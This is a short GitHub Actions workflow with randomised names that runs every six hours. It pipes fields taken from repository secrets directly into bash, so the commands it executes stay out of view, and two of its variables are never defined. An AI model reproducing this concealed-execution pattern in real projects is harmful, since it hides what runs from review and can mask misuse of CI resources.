name: xiaomuma7654
on:
  workflow_dispatch:
  schedule:
    - cron: '27 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiaomuma7654
        env:
          dtz9: ${{ secrets.dtz9 }}
        run: |
          echo $dtz9 | jq -r .ygy52 | /bin/bash
          echo $d9254 | jq -r .j4 | /bin/bash
          echo $zfuxn47 | jq -r .zpfa3 | /bin/bash

